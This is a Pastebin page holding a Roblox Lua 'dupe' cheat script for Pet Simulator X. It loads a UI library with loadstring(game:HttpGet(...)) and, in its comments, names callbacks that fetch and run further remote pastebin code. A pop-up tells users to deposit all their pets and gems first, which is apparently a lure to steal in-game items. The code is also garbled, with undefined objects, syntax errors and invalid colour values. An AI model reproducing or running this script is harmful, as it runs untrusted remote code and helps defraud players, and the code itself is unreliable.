Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
- local Window = OrionLib:MakeWindow({Name = "pet simulatorx dupe + more", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})
- --[[
- Name = <psx gui by BADGEFF>
- HidePremium = <false>
- SaveConfig = <true>
- ConfigFolder = </storage/emulated/BADGEFF.GUI>
- IntroEnabled = <true>
- IntroText = <dupe>
- IntroIcon = <https://images.app.goo.gl/p5k8RLdQFX2b5mqC9>
- Icon = <https://images.app.goo.gl/eCS1LSCxaTijGjee6>
- CloseCallback = <function>
- ]]
- local Tab = Window:MakeTab({
- Name = "dupe",
- Icon = "rbxassetid://4483345998",
- PremiumOnly = false
- })
- --[[
- Name = <dupe>
- Icon = <https://linksharing.samsungcloud.com/mwqFGJwQnAgg>
- PremiumOnly = <false>
- ]]
- local Section = Tab:AddSection({
- Name = "DUPE NOW"
- })
- --[[
- Name = <DUPE NOW>
- ]]
- OrionLib:MakeNotification({
- Name = "Title!",
- Content = "Notification content... what will it say??",
- Image = "rbxassetid://4483345998",
- Time = 5
- })
- --[[
- Title = <PLS DEPOSIT ALL YOU PETS AND GEMS FIRST!>
- Content = <PLS DEPOSIT ALL GEMS OR PETS FOR WORKING a!>
- Image = <https://images.app.goo.gl/p5k8RLdQFX2b5mqC9> - The icon of the notification.
- Time = <0.2>
- ]]
- Tab:AddButton({
- Name = "DUPE NOW!",
- Callback = function()
- print("button pressed")
- end
- })
- --[[
- Name = <DUPE NOW>
- Callback = <loadstring(game:HttpGet("https://pastebin.com/raw/3f2diQd6", true))()>", true))()>
- ]]
- Tab:AddToggle({
- Name = "This is a dupe Script!",
- Default = true,
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <DUPE>
- Default = <true>
- Callback = <loadstring(game:HttpGet("https://pastebin.com/raw/3f2diQd6", true))()>
- ]]
- CoolToggle:Set(true)
- Tab:AddColorpicker({
- Name = "RED",
- Default = Color3.fromRGB(265, 0, 0),
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <RED>
- Default = <color3>
- Callback = <loadstring(game:HttpGet("https://pastebin.com/raw/3f2diQd6", true))()>
- ]]
- ColorPicker:Set(Color3.fromRGB(265,265,265))
- Tab:AddSlider({
- Name = "SPEED",
- Min = 1,
- Max = 20,
- Default = 5,
- Color = Color3.fromRGB(265,265,265),
- Increment = 1,
- ValueName = "DUPE",
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <SPEED>
- Min = <1>
- Max = <20>
- Increment = <5>
- Default = <1>
- ValueName = <1-20>
- Callback = <loadstring(game:HttpGet("https://pastebin.com/raw/97ps5jKw", true))() > - The function of the slider.
- ]]
- Slider:Set(1)
- Tab:AddLabel("SOON")
- CoolLabel:Set("Coiming soon!")
- Tab:AddParagraph(DUPE","DUPE NEW")
- CoolParagraph:Set("DUPE New!", "New DUPE Content!")
- Tab:AddTextbox({
- Name = "tutorial",
- Default = "tutorial:
- 1.click dupe
- 2.wait for the Timer
- 3.wait for kick than rejoin!
- 4.duped!",
- TextDisappear = true,
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <TUTORIAL>
- Default = <5>
- TextDisappear = <false>
- Callback = <function>
- ]]
- Tab:AddBind({
- Name = "BADGEFF",
- Default = Enum.KeyCode.E,
- Hold = true,
- Callback = function()
- print("press")
- end
- })
- --[[
- Name = <BADGEFF>
- Default = <BADGEFF63V>
- Hold = <true>
- Callback = <function>
- ]]
- Bind:Set(Enum.KeyCode.E)
- Tab:AddDropdown({
- Name = "DUPE",
- Default = "1",
- Options = {"1", "2", "3"},
- Callback = function(Value)
- print(Value)
- end
- })
- --[[
- Name = <DUPE>
- Default = <1>
- Options = <1= GEMS DUPE 2= DUPE PETS 3= DUPE ALL>
- Callback = <loadstring(game:HttpGet("https://pastebin.com/raw/97ps5jKw", true))() >
- ]]
- Dropdown:Refresh(List<table>,true)
- Dropdown:Set("2")
- OrionLib:Init(3312621436)
- Tab1:AddToggle({
- Name = "DUPE",
- Default = true,
- Save = true,
- Flag = "DUPE"
- })
- print(OrionLib.Flags["DUPE"].Value)
- OrionLib:Destroy(true)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement